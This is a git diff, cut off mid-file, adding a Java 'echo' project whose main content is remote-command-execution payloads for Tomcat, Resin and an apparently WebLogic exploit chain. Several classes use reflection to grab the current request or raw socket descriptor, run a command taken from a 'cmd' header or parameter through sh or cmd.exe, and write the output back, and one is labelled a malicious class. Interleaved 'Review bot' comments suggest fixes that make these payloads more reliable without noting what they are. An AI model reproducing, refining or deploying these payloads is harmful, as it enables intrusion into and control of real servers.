+ # workaround for JBEAP-8937 (on Solaris 10/Sparc)
+ if [ -d "${wdir}" ]; then
+ wdir=`cd "$wdir/.."; pwd`
+ fi
+ # end of workaround
+ done
+ echo "${basedir}"
+}
+
+# concatenates all lines of a file
+concat_lines() {
+ if [ -f "$1" ]; then
+ echo "$(tr -s '\n' ' ' < "$1")"
+ fi
+}
+
+BASE_DIR=`find_maven_basedir "$(pwd)"`
+if [ -z "$BASE_DIR" ]; then
+ exit 1;
+fi
+
+##########################################################################################
+# Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
+# This allows using the maven wrapper in projects that prohibit checking in binary data.
+##########################################################################################
+if [ -r "$BASE_DIR/.mvn/wrapper/maven-wrapper.jar" ]; then
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Found .mvn/wrapper/maven-wrapper.jar"
+ fi
+else
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Couldn't find .mvn/wrapper/maven-wrapper.jar, downloading it ..."
+ fi
+ if [ -n "$MVNW_REPOURL" ]; then
+ jarUrl="$MVNW_REPOURL/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
+ else
+ jarUrl="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
+ fi
+ while IFS="=" read key value; do
+ case "$key" in (wrapperUrl) jarUrl="$value"; break ;;
+ esac
+ done < "$BASE_DIR/.mvn/wrapper/maven-wrapper.properties"
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Downloading from: $jarUrl"
+ fi
+ wrapperJarPath="$BASE_DIR/.mvn/wrapper/maven-wrapper.jar"
+ if $cygwin; then
+ wrapperJarPath=`cygpath --path --windows "$wrapperJarPath"`
+ fi
+
+ if command -v wget > /dev/null; then
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Found wget ... using wget"
+ fi
+ if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
+ wget "$jarUrl" -O "$wrapperJarPath"
+ else
+ wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath"
+ fi
+ elif command -v curl > /dev/null; then
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Found curl ... using curl"
+ fi
+ if [ -z "$MVNW_USERNAME" ] || [ -z "$MVNW_PASSWORD" ]; then
+ curl -o "$wrapperJarPath" "$jarUrl" -f
+ else
+ curl --user $MVNW_USERNAME:$MVNW_PASSWORD -o "$wrapperJarPath" "$jarUrl" -f
+ fi
+
+ else
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo "Falling back to using Java to download"
+ fi
+ javaClass="$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.java"
+ # For Cygwin, switch paths to Windows format before running javac
+ if $cygwin; then
+ javaClass=`cygpath --path --windows "$javaClass"`
+ fi
+ if [ -e "$javaClass" ]; then
+ if [ ! -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo " - Compiling MavenWrapperDownloader.java ..."
+ fi
+ # Compiling the Java class
+ ("$JAVA_HOME/bin/javac" "$javaClass")
+ fi
+ if [ -e "$BASE_DIR/.mvn/wrapper/MavenWrapperDownloader.class" ]; then
+ # Running the downloader
+ if [ "$MVNW_VERBOSE" = true ]; then
+ echo " - Running MavenWrapperDownloader.java ..."
+ fi
+ ("$JAVA_HOME/bin/java" -cp .mvn/wrapper MavenWrapperDownloader "$MAVEN_PROJECTBASEDIR")
+ fi
+ fi
+ fi
+fi
+##########################################################################################
+# End of extension
+##########################################################################################
+
+export MAVEN_PROJECTBASEDIR=${MAVEN_BASEDIR:-"$BASE_DIR"}
+if [ "$MVNW_VERBOSE" = true ]; then
+ echo $MAVEN_PROJECTBASEDIR
+fi
+MAVEN_OPTS="$(concat_lines "$MAVEN_PROJECTBASEDIR/.mvn/jvm.config") $MAVEN_OPTS"
+
+# For Cygwin, switch paths to Windows format before running java
+if $cygwin; then
+ [ -n "$M2_HOME" ] &&
+ M2_HOME=`cygpath --path --windows "$M2_HOME"`
+ [ -n "$JAVA_HOME" ] &&
+ JAVA_HOME=`cygpath --path --windows "$JAVA_HOME"`
+ [ -n "$CLASSPATH" ] &&
+ CLASSPATH=`cygpath --path --windows "$CLASSPATH"`
+ [ -n "$MAVEN_PROJECTBASEDIR" ] &&
+ MAVEN_PROJECTBASEDIR=`cygpath --path --windows "$MAVEN_PROJECTBASEDIR"`
+fi
+
+# Provide a "standardized" way to retrieve the CLI args that will
+# work with both Windows and non-Windows executions.
+MAVEN_CMD_LINE_ARGS="$MAVEN_CONFIG $@"
+export MAVEN_CMD_LINE_ARGS
+
+WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+exec "$JAVACMD" \
+ $MAVEN_OPTS \
+ -classpath "$MAVEN_PROJECTBASEDIR/.mvn/wrapper/maven-wrapper.jar" \
+ "-Dmaven.home=${M2_HOME}" "-Dmaven.multiModuleProjectDirectory=${MAVEN_PROJECTBASEDIR}" \
+ ${WRAPPER_LAUNCHER} $MAVEN_CONFIG "$@"
diff --git "a/java\345\233\236\346\230\276/mvnw.cmd" "b/java\345\233\236\346\230\276/mvnw.cmd"
new file mode 100644
index 0000000..c8d4337
--- /dev/null
+++ "b/java\345\233\236\346\230\276/mvnw.cmd"
@@ -0,0 +1,182 @@
+@REM ----------------------------------------------------------------------------
+@REM Licensed to the Apache Software Foundation (ASF) under one
+@REM or more contributor license agreements. See the NOTICE file
+@REM distributed with this work for additional information
+@REM regarding copyright ownership. The ASF licenses this file
+@REM to you under the Apache License, Version 2.0 (the
+@REM "License"); you may not use this file except in compliance
+@REM with the License. You may obtain a copy of the License at
+@REM
+@REM https://www.apache.org/licenses/LICENSE-2.0
+@REM
+@REM Unless required by applicable law or agreed to in writing,
+@REM software distributed under the License is distributed on an
+@REM "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+@REM KIND, either express or implied. See the License for the
+@REM specific language governing permissions and limitations
+@REM under the License.
+@REM ----------------------------------------------------------------------------
+
+@REM ----------------------------------------------------------------------------
+@REM Maven Start Up Batch script
+@REM
+@REM Required ENV vars:
+@REM JAVA_HOME - location of a JDK home dir
+@REM
+@REM Optional ENV vars
+@REM M2_HOME - location of maven2's installed home dir
+@REM MAVEN_BATCH_ECHO - set to 'on' to enable the echoing of the batch commands
+@REM MAVEN_BATCH_PAUSE - set to 'on' to wait for a keystroke before ending
+@REM MAVEN_OPTS - parameters passed to the Java VM when running Maven
+@REM e.g. to debug Maven itself, use
+@REM set MAVEN_OPTS=-Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=8000
+@REM MAVEN_SKIP_RC - flag to disable loading of mavenrc files
+@REM ----------------------------------------------------------------------------
+
+@REM Begin all REM lines with '@' in case MAVEN_BATCH_ECHO is 'on'
+@echo off
+@REM set title of command window
+title %0
+@REM enable echoing by setting MAVEN_BATCH_ECHO to 'on'
+@if "%MAVEN_BATCH_ECHO%" == "on" echo %MAVEN_BATCH_ECHO%
+
+@REM set %HOME% to equivalent of $HOME
+if "%HOME%" == "" (set "HOME=%HOMEDRIVE%%HOMEPATH%")
+
+@REM Execute a user defined script before this one
+if not "%MAVEN_SKIP_RC%" == "" goto skipRcPre
+@REM check for pre script, once with legacy .bat ending and once with .cmd ending
+if exist "%HOME%\mavenrc_pre.bat" call "%HOME%\mavenrc_pre.bat"
+if exist "%HOME%\mavenrc_pre.cmd" call "%HOME%\mavenrc_pre.cmd"
+:skipRcPre
+
+@setlocal
+
+set ERROR_CODE=0
+
+@REM To isolate internal variables from possible post scripts, we use another setlocal
+@setlocal
+
+@REM ==== START VALIDATION ====
+if not "%JAVA_HOME%" == "" goto OkJHome
+
+echo.
+echo Error: JAVA_HOME not found in your environment. >&2
+echo Please set the JAVA_HOME variable in your environment to match the >&2
+echo location of your Java installation. >&2
+echo.
+goto error
+
+:OkJHome
+if exist "%JAVA_HOME%\bin\java.exe" goto init
+
+echo.
+echo Error: JAVA_HOME is set to an invalid directory. >&2
+echo JAVA_HOME = "%JAVA_HOME%" >&2
+echo Please set the JAVA_HOME variable in your environment to match the >&2
+echo location of your Java installation. >&2
+echo.
+goto error
+
+@REM ==== END VALIDATION ====
+
+:init
+
+@REM Find the project base dir, i.e. the directory that contains the folder ".mvn".
+@REM Fallback to current working directory if not found.
+
+set MAVEN_PROJECTBASEDIR=%MAVEN_BASEDIR%
+IF NOT "%MAVEN_PROJECTBASEDIR%"=="" goto endDetectBaseDir
+
+set EXEC_DIR=%CD%
+set WDIR=%EXEC_DIR%
+:findBaseDir
+IF EXIST "%WDIR%"\.mvn goto baseDirFound
+cd ..
+IF "%WDIR%"=="%CD%" goto baseDirNotFound
+set WDIR=%CD%
+goto findBaseDir
+
+:baseDirFound
+set MAVEN_PROJECTBASEDIR=%WDIR%
+cd "%EXEC_DIR%"
+goto endDetectBaseDir
+
+:baseDirNotFound
+set MAVEN_PROJECTBASEDIR=%EXEC_DIR%
+cd "%EXEC_DIR%"
+
+:endDetectBaseDir
+
+IF NOT EXIST "%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config" goto endReadAdditionalConfig
+
+@setlocal EnableExtensions EnableDelayedExpansion
+for /F "usebackq delims=" %%a in ("%MAVEN_PROJECTBASEDIR%\.mvn\jvm.config") do set JVM_CONFIG_MAVEN_PROPS=!JVM_CONFIG_MAVEN_PROPS! %%a
+@endlocal & set JVM_CONFIG_MAVEN_PROPS=%JVM_CONFIG_MAVEN_PROPS%
+
+:endReadAdditionalConfig
+
+SET MAVEN_JAVA_EXE="%JAVA_HOME%\bin\java.exe"
+set WRAPPER_JAR="%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.jar"
+set WRAPPER_LAUNCHER=org.apache.maven.wrapper.MavenWrapperMain
+
+set DOWNLOAD_URL="https://repo.maven.apache.org/maven2/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
+
+FOR /F "tokens=1,2 delims==" %%A IN ("%MAVEN_PROJECTBASEDIR%\.mvn\wrapper\maven-wrapper.properties") DO (
+ IF "%%A"=="wrapperUrl" SET DOWNLOAD_URL=%%B
+)
+
+@REM Extension to allow automatically downloading the maven-wrapper.jar from Maven-central
+@REM This allows using the maven wrapper in projects that prohibit checking in binary data.
+if exist %WRAPPER_JAR% (
+ if "%MVNW_VERBOSE%" == "true" (
+ echo Found %WRAPPER_JAR%
+ )
+) else (
+ if not "%MVNW_REPOURL%" == "" (
+ SET DOWNLOAD_URL="%MVNW_REPOURL%/io/takari/maven-wrapper/0.5.6/maven-wrapper-0.5.6.jar"
+ )
+ if "%MVNW_VERBOSE%" == "true" (
+ echo Couldn't find %WRAPPER_JAR%, downloading it ...
+ echo Downloading from: %DOWNLOAD_URL%
+ )
+
+ powershell -Command "&{"^
+ "$webclient = new-object System.Net.WebClient;"^
+ "if (-not ([string]::IsNullOrEmpty('%MVNW_USERNAME%') -and [string]::IsNullOrEmpty('%MVNW_PASSWORD%'))) {"^
+ "$webclient.Credentials = new-object System.Net.NetworkCredential('%MVNW_USERNAME%', '%MVNW_PASSWORD%');"^
+ "}"^
+ "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $webclient.DownloadFile('%DOWNLOAD_URL%', '%WRAPPER_JAR%')"^
+ "}"
+ if "%MVNW_VERBOSE%" == "true" (
+ echo Finished downloading %WRAPPER_JAR%
+ )
+)
+@REM End of extension
+
+@REM Provide a "standardized" way to retrieve the CLI args that will
+@REM work with both Windows and non-Windows executions.
+set MAVEN_CMD_LINE_ARGS=%*
+
+%MAVEN_JAVA_EXE% %JVM_CONFIG_MAVEN_PROPS% %MAVEN_OPTS% %MAVEN_DEBUG_OPTS% -classpath %WRAPPER_JAR% "-Dmaven.multiModuleProjectDirectory=%MAVEN_PROJECTBASEDIR%" %WRAPPER_LAUNCHER% %MAVEN_CONFIG% %*
+if ERRORLEVEL 1 goto error
+goto end
+
+:error
+set ERROR_CODE=1
+
+:end
+@endlocal & set ERROR_CODE=%ERROR_CODE%
+
+if not "%MAVEN_SKIP_RC%" == "" goto skipRcPost
+@REM check for post script, once with legacy .bat ending and once with .cmd ending
+if exist "%HOME%\mavenrc_post.bat" call "%HOME%\mavenrc_post.bat"
+if exist "%HOME%\mavenrc_post.cmd" call "%HOME%\mavenrc_post.cmd"
+:skipRcPost
+
+@REM pause the script if MAVEN_BATCH_PAUSE is set to 'on'
+if "%MAVEN_BATCH_PAUSE%" == "on" pause
+
+if "%MAVEN_TERMINATE_CMD%" == "on" exit %ERROR_CODE%
+
+exit /B %ERROR_CODE%
diff --git "a/java\345\233\236\346\230\276/pom.xml" "b/java\345\233\236\346\230\276/pom.xml"
new file mode 100644
index 0000000..d0167b3
--- /dev/null
+++ "b/java\345\233\236\346\230\276/pom.xml"
@@ -0,0 +1,41 @@
+
+
+ 4.0.0
+
+ org.springframework.boot
+ spring-boot-starter-parent
+ 2.5.5
+
+
+ com.firebasky
+ echo
+ 0.0.1-SNAPSHOT
+ echo
+ echo for java exec
+
+ 1.8
+
+
+
+ org.springframework.boot
+ spring-boot-starter-web
+
+
+
+ org.springframework.boot
+ spring-boot-starter-test
+ test
+
+
+
+
+
+
+ org.springframework.boot
+ spring-boot-maven-plugin
+
+
+
+
+
diff --git "a/java\345\233\236\346\230\276/resin/Echo_HttpRequest.java" "b/java\345\233\236\346\230\276/resin/Echo_HttpRequest.java"
new file mode 100644
index 0000000..5d823fd
--- /dev/null
+++ "b/java\345\233\236\346\230\276/resin/Echo_HttpRequest.java"
@@ -0,0 +1,102 @@
+package com.firebasky.exp;
+
+/**
+ * TargetObject = {com.caucho.env.thread2.ResinThread2}
+ * ---> threadLocals = {java.lang.ThreadLocal$ThreadLocalMap}
+ * ---> table = {class [Ljava.lang.ThreadLocal$ThreadLocalMap$Entry;}
+ * ---> [6] = {java.lang.ThreadLocal$ThreadLocalMap$Entry}
+ * ---> value = {com.caucho.server.http.HttpRequest}
+ */
+
+/**
+ * resin 回显
+ * 1.线程对象中request
+ * 2.request对象存储在静态变量或者特定类里
+ */
+public class Echo_HttpRequest {
+ static {
+ try {
+ getResponse();
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+ //线程对象中request
+ public static void getResponse() throws Exception {
+ Thread thread = Thread.currentThread();
+ java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("threadLocals");
+ threadLocals.setAccessible(true);
+ Object threadLocalMap = threadLocals.get(thread);
+
+ Class threadLocalMapClazz = Class.forName("java.lang.ThreadLocal$ThreadLocalMap");
+ java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("table");
+ tableField.setAccessible(true);
+ Object[] objects = (Object[]) tableField.get(threadLocalMap);
+
+ Class entryClass = Class.forName("java.lang.ThreadLocal$ThreadLocalMap$Entry");
+ java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("value");
+ entryValueField.setAccessible(true);
+
+ for (Object object : objects) {
+ if (object != null) {
+ Object valueObject = entryValueField.get(object);
+ if (valueObject != null) {
+ if (valueObject.getClass().getName().equals("com.caucho.server.http.HttpRequest")) {
+ com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)valueObject;
+ //执行命令
+ String cmd1 = httpRequest.getHeader("cmd");
+ String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1};
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+ //response
+ com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
+ httpResponse.setHeader("Content-Length", output.length() + "");
+ java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream");
+ method.setAccessible(true);
+ com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse);
+ httpResponseStream.write(output.getBytes(), 0, output.length());
+ httpResponseStream.close();
+ }
+ }
+ }
+ }
+ }
+
+ //request对象存储在静态变量或者特定类里
+ public static void getResponse2() throws Exception {
+ Class tcpsocketLinkClazz = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.network.listen.TcpSocketLink");
+ java.lang.reflect.Method getCurrentRequestM = tcpsocketLinkClazz.getMethod("getCurrentRequest");
+ Object currentRequest = getCurrentRequestM.invoke(null);
+ java.lang.reflect.Field f = currentRequest.getClass().getSuperclass().getDeclaredField("_responseFacade");
+ f.setAccessible(true);
+ Object response = f.get(currentRequest);
+ java.lang.reflect.Method getWriterM = response.getClass().getMethod("getWriter");
+ java.io.PrintWriter w = ( java.io.PrintWriter) getWriterM.invoke(response);
+ //response
+ String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", "whoami"} : new String[]{"cmd.exe", "/c","whoami"};
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+ //输出
+ w.write(output);
+ }
+
+ //request对象存储在静态变量或者特定类里
+ public static void getResponse3() throws Exception {
+ Class si = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation");
+ java.lang.reflect.Method getContextRequest = si.getMethod("getContextRequest");
+ com.caucho.server.http.HttpServletRequestImpl req = (com.caucho.server.http.HttpServletRequestImpl) getContextRequest.invoke(null);
+ try {
+ if (req.getHeader("cmd") != null) {
+ String cmd = req.getHeader("cmd");
+ javax.servlet.http.HttpServletResponse rep = (javax.servlet.http.HttpServletResponse) req.getServletResponse();
+ java.io.PrintWriter out = rep.getWriter();
+ out.println(new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next());
+ }
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+
+}
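Review bot: `httpResponse.setHeader("Content-Length", output.length() + "")` and `httpResponseStream.write(output.getBytes(), 0, output.length())` both use the character count where a byte count is required, so any multibyte command output is truncated on the wire and announced with the wrong length. Encode once and size both from the array: `byte[] body = output.getBytes(java.nio.charset.StandardCharsets.UTF_8); httpResponse.setHeader("Content-Length", String.valueOf(body.length)); httpResponseStream.write(body, 0, body.length);`. `httpRequest.getHeader("cmd")` is handed to `sh -c` / `cmd.exe /c` unchecked, so a request without that header executes the literal string `null`; a `if (cmd1 == null) return;` before the `exec` avoids that. `getResponse2()` and `getResponse3()` are defined but never called from the static initializer, which reads as intentional (alternative lookups) but deserves a one-line comment saying so.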
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/EchoApplication.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/EchoApplication.java"
new file mode 100644
index 0000000..c64a345
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/EchoApplication.java"
@@ -0,0 +1,13 @@
+package com.firebasky.echo;
+
+import org.springframework.boot.SpringApplication;
+import org.springframework.boot.autoconfigure.SpringBootApplication;
+
+@SpringBootApplication
+public class EchoApplication {
+
+ public static void main(String[] args) {
+ SpringApplication.run(EchoApplication.class, args);
+ }
+
+}
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/Alltomcat.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/Alltomcat.java"
new file mode 100644
index 0000000..f471fbf
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/Alltomcat.java"
@@ -0,0 +1,83 @@
+package com.firebasky.echo.controller;
+
+/**
+ * 局限 数据大小/tomcat7
+ */
+
+public class Alltomcat {
+ public Alltomcat() {
+ try{
+ //传递命令的参数名
+ String pass="cmd";
+ //WebappClassLoaderBase
+ org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
+
+ //ApplicationContext
+ org.apache.catalina.Context context=webappClassLoaderBase.getResources().getContext();
+ java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
+ contextField.setAccessible(true);
+ org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(context);
+
+ //StandardService
+ java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
+ serviceField.setAccessible(true);
+ org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
+
+ //Connector
+ org.apache.catalina.connector.Connector connectors[]=standardService.findConnectors();
+
+ //筛选Connector
+ for (int i=0;i threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null);
+ ThreadLocal threadLocalResponse = (ThreadLocal) lastServicedResponse.get(null);
+ javax.servlet.ServletRequest request = threadLocalRequest.get();
+ javax.servlet.ServletResponse response = threadLocalResponse.get();
+
+ String cmd=request.getParameter("cmd");
+
+ if(cmd!=null){
+ String[] cmds=null;
+
+ if(System.getProperty("os.name").toLowerCase().contains("win")){
+ cmds=new String[]{"cmd.exe", "/c", cmd};
+ }else{
+ cmds=new String[]{"/bin/bash", "-c", cmd};
+ }
+
+ java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+
+ java.io.Writer writer = response.getWriter();
+ //目前得到的response是org.apache.catalina.connector.ResponseFacade,其封装了org.apache.catalina.connector.Response,要修改的usingWriter字段在后者中
+ java.lang.reflect.Field r=response.getClass().getDeclaredField("response");
+ r.setAccessible(true);
+ java.lang.reflect.Field usingWriter = Class.forName("org.apache.catalina.connector.Response").getDeclaredField("usingWriter");
+ usingWriter.setAccessible(true);
+ usingWriter.set(r.get(response), Boolean.FALSE);
+ //解决报错。。
+ writer.write(output);
+ writer.flush();
+ writer.close();
+ }
+ }
+
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ return "test";
+ }
+}
\ No newline at end of file
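Review bot: The hunk is partly unreadable as rendered — the text between `for (int i=0;i` and `threadLocalRequest = (ThreadLocal) lastServicedRequest.get(null);` on that line was dropped (it looks like a `<`…`>` span swallowed by extraction), so the Connector filtering and the `lastServiced*` field setup cannot be reviewed here, and the 83 lines announced by the `@@` header are not all shown. In the visible part, `Runtime.getRuntime().exec(cmds)` at the `java.io.InputStream in = ...` line never drains or closes the process's stderr and never destroys the `Process`, so a command that writes heavily to stderr stalls on a full pipe and every call leaks pipe handles; `socket_v2.ShellExec` in the same change already uses `ProcessBuilder` with `redirectErrorStream(true)`, and the same two lines here would make the controllers consistent: `Process p = new ProcessBuilder(cmds).redirectErrorStream(true).start(); java.io.InputStream in = p.getInputStream();`. Flipping `usingWriter` to `Boolean.FALSE` after `response.getWriter()` depends on a private field of `org.apache.catalina.connector.Response`; the `//解决报错。。` comment should name the Tomcat versions this was verified against, since a layout change there turns into a silent `NoSuchFieldException` swallowed by the outer `catch`.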
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/demo.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/demo.java"
new file mode 100644
index 0000000..10f9e08
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/demo.java"
@@ -0,0 +1,12 @@
+package com.firebasky.echo.controller;
+
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class demo {
+ @RequestMapping("/demo")
+ public void demo() throws InterruptedException {
+ new Alltomcat();
+ }
+}
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket.java"
new file mode 100644
index 0000000..72e7f63
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket.java"
@@ -0,0 +1,56 @@
+package com.firebasky.echo.controller;
+
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class socket {
+ @RequestMapping("/socket")
+ public String test(){
+ try{
+ //获取文件描述符 局限有点大 ubu 没有成功。。
+ String[] cmd = new String[]{"/bin/sh","-c","inode=`cat /proc/net/tcp|awk '{if($10>0)print}'|awk '{print $3,$10}'|grep -i 22B8|awk '{print $2}'`;fd=`ls -l /proc/$PPID/fd|grep $inode|awk '{print $9}'`;echo -n $fd"};
+ //22B8===> 8888
+ // curl --local-port 8888 target
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.io.InputStreamReader isr = new java.io.InputStreamReader(in);
+ java.io.BufferedReader br = new java.io.BufferedReader(isr);
+ StringBuilder stringBuilder = new StringBuilder();
+ String line;
+ while ((line = br.readLine()) != null){
+ stringBuilder.append(line);
+ }
+ int fd = Integer.valueOf(stringBuilder.toString()).intValue();
+
+
+ //获取命令执行结果
+ cmd = new String[]{"/bin/sh","-c","whoami"};
+ in = Runtime.getRuntime().exec(cmd).getInputStream();
+ isr = new java.io.InputStreamReader(in);
+ br = new java.io.BufferedReader(isr);
+ stringBuilder = new StringBuilder();
+ while ((line = br.readLine()) != null){
+ stringBuilder.append(line);
+ }
+ String result = stringBuilder.toString();
+
+ //拼装成正常的HTTP响应
+ String response = "HTTP/1.1 200 OK\r\n"
+ + "Content-Type: text/html\r\n"
+ + "Content-Length: " + result.length()
+ + "\r\n\r\n"
+ + result
+ + "\r\n\r\n";
+
+ //写入socket
+ java.lang.reflect.Constructor c=java.io.FileDescriptor.class.getDeclaredConstructor(new Class[]{Integer.TYPE});
+ c.setAccessible(true);
+ java.io.FileOutputStream os = new java.io.FileOutputStream((java.io.FileDescriptor)c.newInstance(new Object[]{new Integer(fd)}));
+ os.write(response.getBytes());
+ os.close();
+ }catch (Exception e){
+ e.printStackTrace();
+ }
+ return "test";
+ }
+}
\ No newline at end of file
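Review bot: `os.close()` on the `FileOutputStream` built from the reconstructed `FileDescriptor` closes the connection's socket fd out from under Tomcat, which still owns it; once that number is reused by a later `accept()`, the poller and worker will read from and write to a different client's connection, so drop the `close()` and only `os.flush()` (the sibling `socket_v2.writeFd` already leaves the fd open). `"Content-Length: " + result.length()` counts characters while `response.getBytes()` writes platform-encoded bytes, so non-ASCII output yields a wrong length; compute `byte[] payload = result.getBytes("UTF-8");` once and use `payload.length` for the header and the write. In the shell pipeline, `$inode` is unquoted and empty whenever the `22B8` port lookup misses, so `grep $inode` then matches every fd line and `Integer.valueOf(stringBuilder.toString())` fails on the concatenated names; a `[ -n "$inode" ] || exit 1` before the `ls -l` would fail loudly instead of falling into the generic `catch`.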
diff --git "a/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket_v2.java" "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket_v2.java"
new file mode 100644
index 0000000..07bb889
--- /dev/null
+++ "b/java\345\233\236\346\230\276/src/main/java/com/firebasky/echo/controller/socket_v2.java"
@@ -0,0 +1,145 @@
+package com.firebasky.echo.controller;
+
+import java.io.*;
+import java.lang.reflect.Constructor;
+import java.nio.file.Files;
+import java.nio.file.Path;
+import java.nio.file.Paths;
+import java.util.ArrayList;
+import java.util.List;
+
+// 将被转换成字节的恶意类
+// 调用 com.weblogic.exp.XmlExp.say("id")
+public class socket_v2 {
+ public socket_v2() throws Exception {
+ say("whoami");
+ }
+
+ public static String getInode() throws IOException {
+ File f1 = new File("/proc/thread-self/net/tcp");
+ BufferedReader br = new BufferedReader(new FileReader(f1));
+ String line, inode = "";
+
+ String result = "";
+ while ((line = br.readLine()) != null) {
+ String[] lineArr = line.split("\\s+");
+ String remoteAddr = lineArr[3];
+
+ result += line + "\n";
+ // 按源IP/PORT过滤,在各层转发中会变,这个方法不准
+ //https://tool.520101.com/wangluo/jinzhizhuanhuan/
+ if (remoteAddr.contains("1748878")) {
+ inode = lineArr[10];
+ if (!inode.equals("0")) {
+ break;
+ }
+ }
+ }
+ return inode;
+ }
+
+ public static Boolean isClass(String className) {
+ try {
+ Class.forName(className);
+ return true;
+ } catch (ClassNotFoundException e) {
+ return false;
+ }
+ }
+
+ public static FileDescriptor getFd(File file) throws Exception {
+ Class clazz = Class.forName("java.io.FileDescriptor");
+ Constructor m = clazz.getDeclaredConstructor(new Class[]{Integer.TYPE});
+ m.setAccessible(true);
+
+ String[] fdArr = file.toString().split("/");
+ String fdId = fdArr[fdArr.length - 1];
+ FileDescriptor fd = (FileDescriptor) m.newInstance(new Object[]{new Integer(fdId)});
+ return fd;
+ }
+
+ public static File getFdFile(String inode) throws Exception {
+ String tmp = "";
+ if (isClass("java.nio.file.Path")) {
+ File file = new File("/proc/thread-self/fd");
+ File[] fs = file.listFiles();
+
+ for (File f : fs) {
+ Path path = Paths.get(f.toString(), new String[]{""});
+ String link = Files.readSymbolicLink(path).toString();
+
+ if (link.contains(inode)) {
+ return f;
+ }
+ }
+ } else {
+ File file = new File("/proc");
+ File[] fs = file.listFiles();
+
+ for (File f1 : fs) {
+ if (!f1.isDirectory()) continue;
+ if (!f1.canRead()) continue;
+ if (!f1.getPath().matches("/proc/[0-9]+")) continue;
+
+ File f2 = new File(f1.getPath() + "/fd/");
+ for (File f3 : f2.listFiles()) {
+ if (!f3.exists()) continue;
+ if (f3.isDirectory()) continue;
+ if (!f3.canWrite()) continue;
+ String id = f3.getName();
+ if (id == null || id.length() == 0) continue;
+ try {
+ if (Long.parseLong(id) < 3) continue;
+ } catch (Exception e) {
